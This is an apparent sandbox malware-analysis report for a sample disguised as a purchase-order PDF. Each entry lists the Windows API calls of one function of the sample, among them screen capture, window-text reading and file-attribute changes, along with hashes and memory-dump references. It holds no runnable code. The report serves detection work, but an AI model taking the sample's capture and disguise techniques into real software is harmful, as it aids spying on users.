                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                                                                            • String ID: X$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3021350936-1944015008
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0a2e95df084d96ac0a9c696da0d05d8742bfbf7a11ed66d71c3638679530d7f4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a2e95df084d96ac0a9c696da0d05d8742bfbf7a11ed66d71c3638679530d7f4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0045F4AE
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: InfoItemMenu$Sleep_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 1504565804-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
• Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
• Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
• Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
• Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
APIs
• _wcsncpy.LIBCMT ref: 0045CCFA
• __wsplitpath.LIBCMT ref: 0045CD3C
• _wcscat.LIBCMT ref: 0045CD51
• _wcscat.LIBCMT ref: 0045CD63
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
• _wcscpy.LIBCMT ref: 0045CE14
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 1153243558-438819550
• Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
• Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
• Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
• Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
APIs
• _memset.LIBCMT ref: 00455127
• GetMenuItemInfoW.USER32 ref: 00455146
• DeleteMenu.USER32(?,?,00000000), ref: 004551B2
• DeleteMenu.USER32(?,?,00000000), ref: 004551C8
• GetMenuItemCount.USER32(?), ref: 004551D9
• SetMenu.USER32(?,00000000), ref: 004551E7
• DestroyMenu.USER32(?,?,00000000), ref: 004551F4
• DrawMenuBar.USER32 ref: 00455207
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
• String ID: 0
• API String ID: 1663942905-4108050209
• Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
• Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
• Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
• Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1481289235-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                                                                                                                                                            • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2632138820-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                            • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
• Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
• Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
• Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A

APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
• _wcslen.LIBCMT ref: 00460B00
• __swprintf.LIBCMT ref: 00460B9E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
• GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
• GetDlgCtrlID.USER32(?), ref: 00460CE6
• GetWindowRect.USER32(?,?), ref: 00460D21
• GetParent.USER32(?), ref: 00460D40
• ScreenToClient.USER32(00000000), ref: 00460D47
• GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
• GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB

Strings

Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd

Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
• Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
• Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
• Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6

APIs
• CoTaskMemFree.OLE32(?), ref: 0047D6D3
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• StringFromCLSID.OLE32(?,?), ref: 0047D6B5
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• StringFromIID.OLE32(?,?), ref: 0047D7F0
• CoTaskMemFree.OLE32(?), ref: 0047D80A

Strings

Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd

Similarity
• API ID: FreeFromStringTask_wcslen$_wcscpy
• String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
• API String ID: 2485709727-934586222
• Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
• Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
• Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
• Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A

APIs

Strings

Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd

Similarity
• API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
• String ID: HH
• API String ID: 3381189665-2761332787
• Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
• Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
• Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
• Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A

APIs
• GetDC.USER32(00000000), ref: 00434585
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
• CreateCompatibleDC.GDI32(00000000), ref: 0043459B
• SelectObject.GDI32(00000000,?), ref: 004345A9
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665

Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
